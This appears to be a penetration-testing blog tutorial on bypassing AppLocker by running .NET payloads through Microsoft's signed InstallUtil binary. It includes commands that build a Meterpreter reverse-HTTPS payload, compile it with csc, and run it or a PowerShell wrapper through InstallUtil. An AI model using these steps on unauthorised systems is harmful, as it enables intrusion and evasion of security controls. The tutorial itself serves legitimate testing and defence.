Penetration Testing Lab

AppLocker Bypass – InstallUtil

Advertisements

InstallUtil is a command line utility which is part of the .NET Framework and allows users to quickly install and uninstall applications via the command prompt. Since this utility is a Microsoft signed binary then it could be used to run any .NET executables bypassing in that way AppLocker restrictions. Also this utility is located inside the Windows folder which AppLocker policies are not going to be applied as the contents of the Windows folder are needed to be executed in order for the system to run normally.

This technique was discovered by Casey Smith which on top of that he did some further work by writing C# code that can be used to bypass AppLocker restrictions in order to run PowerShell through the InstallUtil binary.

Generating .NET Executables

The InstallUtil can run executables which are written in .NET language. There is python script written by khr0x40sh which imports Metasploit payloads generated by MSFvenom into a C# template and produces the .NET binary that can be used to evade AppLocker via InstallUtil.

python InstallUtil.py --cs_file pentestlab.cs
--exe_file /root/Desktop/pentestlab.exe --payload
windows/meterpreter/reverse_https --lhost 192.168.1.11 --lport 443

Generating C# Payloads

The command above will generate a C# template which will include the Metasploit ShellCode.

ShellCode inside C# File

The C# file can be compiled as an executable also via the csc binary of a system that is running .NET framework.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe pentestlab.cs

The compiled executable that contains the malicious payload can be then dropped on the target system. AppLocker prevents the file of being executed however through the Installutil this file is executed as normal and returns a Meterpreter session.

Bypass AppLocker via InstallUtil

AppLocker Bypass – Meterpreter Session

Metasploit

There is a specific Metasploit module which can be used to bypass AppLocker via the InstallUtil method.

exploit/windows/local/applocker_bypass

This module will generate a .NET executable on the target system and it will utilize the InstallUtil binary to execute the payload bypassing the AppLocker protection.

Metasploit – AppLocker Bypass

PowerShell

In environments where PowerShell is restricted by AppLocker Casey Smith did some further work and wrote C# code which can be used in conjunction with the InstallUtil bypass technique in order to run PowerShell commands and scripts.

PowerShell Blocked by AppLocker

The C# code can be compiled with the csc binary in order to produce a PowerShell executable.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\System.Management.Automation.dll /out:powershell.exe InstallUtil-PowerShell.cs

However in order for the above command to run it needs the System.Management.Automation.dll which can be found in one of the directories below:

C:\Windows\winsxs\msil_system.management.automation_31bf3856ad364e35_6.1.7601.17514_none_236c706c3e9 3d144
C:\windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35

AppLocker Bypass – Compile a PowerShell Binary

The compiled PowerShell binary can be executed via the InstallUtil in order to execute PowerShell commands.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U powershell.exe

AppLocker Bypass – PowerShell

AppLocker Bypass – PowerShell Version

There is an additional improvement on this code which can be compiled as .DLL and it can take an optional parameter to run PowerShell scripts which are stored locally.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /reference:"C:\System.Management.Automation.dll /out:pshell.dll C:\pshell.cs

AppLocker Bypass – PowerShell DLL

AppLocker Bypass – Execute PowerShell Commands

 

Resources

https://github.com/khr0x40sh/WhiteListEvasion

https://www.rapid7.com/db/modules/exploit/windows/local/applocker_bypass

https://www.exploit-db.com/exploits/39523/

https://github.com/subTee/AllTheThings

 

Advertisements